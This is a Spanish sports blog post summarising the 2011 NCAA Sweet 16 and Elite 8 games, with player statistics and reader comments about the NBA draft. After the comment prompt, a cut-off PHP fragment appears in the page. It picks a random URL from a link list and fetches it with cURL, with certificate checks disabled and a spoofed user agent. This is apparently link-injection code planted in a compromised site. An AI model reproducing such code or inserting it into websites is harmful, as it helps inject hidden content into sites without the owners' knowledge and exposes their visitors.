Resumen Sweet 16 y Elite 8

28 de March de 2011 por kantonyo

Ya tenemos los 4 equipos que disputarán la Final Four de la NCAA en Houston el próximo fin de semana. Conozcámoslos y repasemos lo que dieron de sí los choques del Sweet Sixteen y los Elite Eight:

EAST REGIONAL (NEWARK, NJ)

Sweet 16:

Ohio State (1) – Kentucky (4): Los máximos favoritos al título, los Buckeyes de Ohio State, cayeron eliminados ante la joven plantilla de Kentucky Wildcats contra todo pronóstico. Gracias a esta victoria, los Wildcats han conseguido igualar la meta obtenida el año pasado cuando disponían de una plantilla fantástica con John Wall, DeMarcus Cousins, Patrick Patterson, Eric Bledsoe y Daniel Orton, todos ellos escogidos en primera ronda del draft. John Calipari supo frenar el frenético ritmo que impuso Ohio State a principio del partido colocando al rocoso Josh Harrellson al lado de Jared Sullinger. Harrellson desquició con su agresividad y concentración al alapívot de Ohio State y fue la clave para que los Buckeyes no se marcharan en el marcador. El mismo Harrellson fue el mejor de Kentucky con 17 puntos, 10 rebotes y 3 tapones. Por su parte, Brandon Knight, a pesar de sólo anotar 9 puntos,  decidió el encuentro con un tiro en suspensión a falta de 5 segundos. Terrence Jones, candidato a estar arriba en el draft, tuvo una discreta actuación con 8 puntos (3/10) y 8 rebotes. La sorpresa individual fue el escolta de tercer año DeAndre Liggins que saliendo desde el banco aportó 15 puntos (5/7 3p), 6 rebotes, 3 asistencias y 3 tapones. A pesar de la buena defensa a la que fue sometido, Jared Sullinger acabó con 21 puntos y 16 rebotes (8 ofensivos) demostrando que no se equivocan los que apuestan por él para el top 10 del draft. Esta vez el perímetro de Ohio State no estuvo tan fino: William Buford tuvo porcentajes malísimos acabando con 9 puntos (2/16), mientras que David Lighty (12 puntos, 5/12) y Jon Diebler (16, 5/10) no marcaron diferencias.

Marquette (11) – North Carolina (2): Los Tar Heels no tuvieron ningún problema para doblegar a los Golden Eagles de Marquette por casi 20 puntos de diferencia clasificándose de este modo para el Elite 8 por segunda vez en tres años. La plantilla de North Carolina ha ido creciendo en talento y confianza según avanzaba la temporada a la vez que lo iba haciendo su joven estrella, Harrison Barnes. Sin embargo, el mejor una vez más fue el pívot Tyler Zeller con 27 puntos y 12 rebotes. Tras este partido, Zeller llevaba de promedio en la March Madness 27 puntos y 9 rebotes. Su pareja en la pintura, el alapívot de segundo año, John Henson estuvo sensacional en defensa aportando 14 puntos, 12 rebotes y 5 tapones. Harrison Barnes volvió a pasar de los 20 puntos por tercera vez en el torneo, además de capturar 9 rebotes. Kendall Marshall dirigió el juego de su equipo con gran lucidez repartiendo 7 asistencias. En Marquette, Darius Johnson-Odom no pudo ofrecer el nivel de las eliminatorias anteriores quedándose en unos flojos 7 puntos (2/9), 4 rebotes y 4 perdidas. El alero Jimmy Butler estuvo mejor con 14 puntos y 6 rebotes al igual que el alapívot Jae Crowder que consiguió 11 puntos, 8 rebotes y 3 tapones. La nota positiva de los Golden Eagles, la puso el novato Davante Gardner que saliendo del banquillo cuando estaba todo decidido sumo 16 puntos y 6 rebotes en sólo 18 minutos, realizando su mejor actuación del año.

Elite 8:

Kentucky (4) – North Carolina (2): Hacía 13 años que una universidad tan prestigiosa como Kentucky no se clasificaba para la Final Four. Demasiado tiempo para John Callipari. Anoche, Brandon Knight fue el mejor de su equipo con una completísima actuación de 22 puntos, 7 rebotes, 4 asistencias y 3 robos, además de un triple decisivo a escasos minutos para el final con el partido empatado a 67. Precisamente fue desde la línea de 3 desde donde se empezó a gestar la victoria de unos Devils que anotaron 12 de 22 lanzamientos. Doron Lamb, Terrence Jones, Darius Miller, DeAndre Liggins… todos pusieron de su parte desde más allá de la línea de 3 mientras Josh Harrellson se peleaba en la pintura con Tyler Zeller. Zeller fue el mejor de su equipo con 21 puntos y 9 rebotes, bien secundado por Harrison Barnes con 18 puntos, insuficientes en los minutos finales donde Kentucky estuvo más acertado.

WEST REGIONAL (ANAHEIM, CA)

Sweet 16:

Duke (1) – Arizona (5): Derrick Williams llevó a sus Wildcats al Elite Eight con una memorable actuación ante Duke, en la que acabó con 32 puntos (11/17, 5/6 3p) y 13 rebotes. Con esta actuación el alapívot de Arizona  da un paso de gigante para ser elegido en la primera posición del próximo draft. Esta vez, Derrick estuvo más arropado gracias a la colaboración del alero Solomon Hill con 13 puntos y del base Lamont Jones con 16 puntos y 6 asistencias. De este modo el campeón del año pasado y uno de los máximos favoritos al título quedó eliminado a pesar de acabar  la primera parte ganando por 44-38. La mala actuación del base Nolan Smith (8 puntos, 3/14 y 6 pérdidas de balón) fue clave en la moral de sus compañeros. La vuelta de Kyrie Irving tras la lesión parece haber confundido el rol en el equipo del base de cuarto año. Precisamente fue Kyrie Irving el mejor de los Blue Devils con 28 puntos en el que podría ser su último partido con Duke si es que decide dar el salto a la NBA. Kyle Singler se despidió también de su afición con un buen partido de 18 puntos y 8 rebotes. Los Blue Devils echaron muy en falta un buen juego interior ya que los hermanos Plumlee no estuvieron a la altura en el torneo y Duke sólo consiguió capturar 26 rebotes por los 35 de Arizona.

Connecticut (3) – San Diego State (2): Kemba Walker y Jeremy Lamb se sobraron para eliminar a los complicados Aztecs de San Diego State y es que entre ambos sumaron 60 puntos de los 74 de su equipo. Esta vez, a pesar de los 36 puntazos del base de los Huskies, fue Jeremy Lamb el jugador más decisivo del encuentro con un sensacional robo de balón a falta de 24 segundos. Lamb, escolta de primer año acabó con 24 puntos (9/11). Los Huskies volvieron a tener problemas ofensivos en una pintura donde Alex Oriakhi (5 puntos y 9 rebotes) y Roscoe Smith (5 puntos y 8 rebotes) son sus mejores hombres. En los Aztecas, Kawhi Leonard no estuvo al nivel de los últimos partidos, pero aun así dejó buenas sensaciones con 12 puntos, 9 rebotes y 4 asistencias.

Elite 8:

Arizona (5) – Connecticut (2): Kemba Walker ganó el duelo de figuras a Derrick Williams. Walker acabó con 20 puntos y 7 asistencias volviendo a tener la gran colaboración de Jeremy Lamb con 19 puntos. Los Huskies dominaron durante gran parte del partido y supieron frenar la última acometida de los Wildcats. Los Huskies volvieron a tener el gran hándicap de su juego interior, donde Alex Oriakhi no está al nivel exigido. Arizona dominó por completo esta faceta con 39 rebotes contra los 28 de UConn. Derrick Williams aportó 20 puntos (5/13) y 5 rebotes en una actuación irregular pero con algunas muestras de su talento. Williams fue el encargado de jugarse la última opción de su equipo fallando un triple de forma precipitada que les hubiera dado la victoria.

SOUTHWEST REGIONAL (SAN ANTONIO, TX)

Sweet 16:

Kansas (1) – Richmond (12): Los Jayhawks de Kansas siguen intratables en su periplo por el March Madness. Contra Richmond Spiders no volvieron a tener rival y se llevaron el partido por 20 puntos de diferencia. Brady Morningstar fue esta vez el mejor de Kansas con 18 puntos y 4 asistencias. Kansas no necesitó que los hermanos Morris estuvieran a un nivel competitivo y el alapívot suplente de segundo año, Thomas Robinson tuvo su oportunidad que no desperdició anotando 12 puntos y capturando 14 rebotes en sólo 16 minutos. Justin Harper fue el mejor de los Spiders con 22 puntos (8/18) y 9 rebotes. Kevin Anderson no estuvo correcto y se quedó en 13 puntos con muy malos porcentajes (5/17).

Virginia Commonwealth (11) – Florida State (10): Los Rams de Virginia Commonwealth pasaron al Elite 8 después de eliminar a los Seminoles de Florida State en la prÓrroga con una gran actuación del escolta Bradford Burgess con 26 puntos y anotando la canasta decisiva. El alapívot Jamie Skeen con 11 puntos y 8 rebotes y el base suplente Brandon Rozzell con 16 puntos fueron los otros jugadores destacados en los Rams. Chris Singleton, que todavía sigue convaleciente de su grave lesión, realizó un gran partido con 16 puntos y 9 rebotes más una espectacular canasta a falta de 30 segundos que puso por delante a su equipo. Desgraciadamente para él, no pudo repetir en su último lanzamiento en el que fue taponado a menos de un metro del aro perdiendo la oportunidad de llevarse el partido. El escolta Derwin Kitchen fue el más destacado de Florida State con 23 puntos y 12 rebotes. El freshman Bernard James estuvo peor que en anteriores partidos quedándose en 8 puntos, 9 rebotes y 5 tapones.

Elite 8:

Kansas (1) – Virginia Commonwealth (11): Hace un par de semanas muchos dudaban (incluso ellos mismos) que VCU fuera a ser invitada a jugar la March Madness y ahora, se encuentran en la Final Four a la vista de todo el mundo. Su victoria ante Kansas (teóricamente, el mejor equipo que quedaba en el torneo) es desde hoy mismo una de las grandes sorpresas de la competición. La devastación entre los jugadores y seguidores de los Jayhawks era completa a pesar de no haber sido capaces de superar a los Rams en ningún momento del partido. Los hermanos Morris se esforzaron al máximo con 20 puntos y 16 rebotes de Marcus y 13 y 12 de Markieff pero no pudieron hacer nada para imponerse ante el aluvión de triples que les cayó encima. Jamie Skeen finalizó con 27 puntos (4 triples) y 10 rebotes y Brandon Rozell con 12 puntos (4 triples). VCU jugó posiblemente el mejor partido que recuerdan lo más viejos de lugar y ahora se enfrentará a Butler en la semifinal más improbable de la historia. Será legendario.

SOUTHEST REGIONAL (NEW ORLEANS, LA)

Sweet 16:

Butler (8) – Wisconsin (4): Los Bulldogs ganaron con comodidad y seriedad a los Badgers de Wisconsin con Matt Howard como mejor jugador. Matt anotó 20 puntos y capturó 12 rebotes. El base Shelvin Mack estuvo menos activo que en otros partidos del torneo quedándose en 13 puntos con malos porcentajes (4/13). El alero de primer año Khyle Marshall tuvo una actuación destacada en sus 16 minutos saliendo como suplente con 7 puntos y 7 rebotes. Los Badgers volvieron a dejar claro que son un equipo muy irregular, y tuvieron una actuación mediocre en ataque con sólo un 30% en tiros de campo. Jon Leuer, su mejor jugador de la temporada, se quedó en unos paupérrimos 3 puntos (1/12) siendo la primera vez de la temporada que bajaba de los 10 puntos. Sin duda será una mala despedida del alapívot de Wisconsin que aspira a entrar en el draft. El base Jordan Taylor fue el único que se salvó de la quema, anotando 22 puntos (6/19).

Brigham Young (3) – Florida (2): Jimmer Fredette se despidió del torneo tras la derrota contra Florida en la prórroga. Jimmer estuvo menos acertado a pesar de sus 32 puntos (11/29) con malos porcentajes desde la línea de tres (3/15) y 6 pérdidas de balón. La escasa participación de sus compañeros, a excepción de los 15 rebotes de Chris Collinsworth fue clave en la eliminación de los Cougars. A pesar de esta derrota, Jimmer seguirá aspirando a top 20 del draft. Los Florida Gators demostraron ser un equipo superior en todas sus líneas. El alapívot Alex Tyus fue el mejor del encuentro con 19 puntos (8/9) y 17 rebotes, bien ayudado por el versátil Chandler Parsons con 16 puntos, 9 rebotes y 7 asistencias y de los guards Kenny Boynton con 17 puntos y Erving Walker con 16 puntos, 6 rebotes y 5 asistencias.

Elite 8:

Butler (8) – Florida (2): Al igual que hicieran el año pasado, los Bulldogs de Butler vuelven a ser la gran sorpresa del torneo metiéndose en la Final Four de Houston al ganar en la prórroga a los Gators de Florida. Brad Stevens supo transmitir el carácter necesario a su equipo para remontar durante dos fases del encuentro cuando perdían por más de 10 puntos. Shelvin Mack fue el mejor del partido con 27 puntos, 4 rebotes y 4 asistencias. Matt Howard tuvo más problemas que con Wisconsin quedándose en 14 puntos (5/12) y 5 rebotes. De nuevo, el joven novato Khyle Marshall volvió a dejar buen sabor de boca con sus 10 puntos y 7 rebotes (7 ofensivos) y con una canasta decisiva tras rebote ofensivo en los últimos minutos de la prórroga. Erving Walker tuvo en sus manos el partido antes de llegar al tiempo extra pero no iba a ser su noche y falló el triple. Erving no estuvo bien esta vez y acabó con 8 puntos (1/10) y 4 asistencias. Su compañero en el juego exterior, Kenny Boynton estuvo más acertado con 17 puntos y Alex Tyus volvió a tener una actuación destacada con 14 puntos y 10 rebotes. Pero el mejor de los Gators fue su pívot, Vernon Macklin, con 25 puntos (11/14) y 5 rebotes, realizando su mejor actuación de siempre en la NCAA en su adiós a la competición.

Comenta

8 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Tremendo Kantonyo, muchas gracias!!

      Citar

  2. Viva_Dirk dice:
    #2

    Como para ponerse ahora a pronosticar algo, jojo. Ahora bien, yo creo que UConn no la ha visto igual de bien en mucho tiempo, y además si se llevan el campeonato con Kemba Walker haciendo un gran papel puede catapultarse muy muy arriba en el draft.

      Citar

  3. Txusma dice:
    #3

    Ahora mismo anda en el TOP-10. No sé si será su techo por mucho que gane UConn. Este tipo de jugadores siempre es sospechoso

      Citar

  4. Len Bias dice:
    #4

    Cuándo es la Final Four? Alguna forma de verla además de enlaces p2p?

    A quién habéis visto como candidatos al #1 del draft? Los mocks ponen a Derrick Williams con Harrison Barnes y Kyrie Erving detrás

      Citar

  5. Viva_Dirk dice:
    #5

    Yo a dia de hoy veo a Derrick Williams Nº1 claro, luego esos 3 que nombras y Kemba Walker deberian estar ahí detrás.

    Y Txus, si gana haciendo un buen papel o incluso si se sale aunque no ganen creo que asegura Top5, jugadores como Marbury, Francis, Baron Davis o Gary Payton fueron elegidos muy arriba y era del perfil de Kemba Walker en la universidad, y para mi tiene el importantísimo plus de llevar varios años en la NCAA.

      Citar

  6. Viva_Dirk dice:
    #6

    Y Jared Sullinger se me olvidaba, también parece que andará en el Top5 o muy cerca.

      Citar

  7. Ru dice:
    #7

    Sullinger dijo que la temporada que viene volvería a Ohio State después de quedar eliminado,aún así viendo las predicciones de presentarse este año quedaría muy arriba,TOP 5 con total seguridad.De todas formas entre Derrick Williams e Irving estará la cosa.

      Citar

  8. Sancho88 dice:
    #8

    por favor, alguien esta viendo el indiana – boston? es maravillosa la estampa. Doc Rivers indignadísimo con las tonterías de Krstic y un niño detrás con el helado. Es acojonante, lleva todo el partido con el mismo helado, y Doc Rivers todo el rato levantado y enfadado, y el niño está igual que indignado que Rivers. Es muy mítico y muy graciosa la estampa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>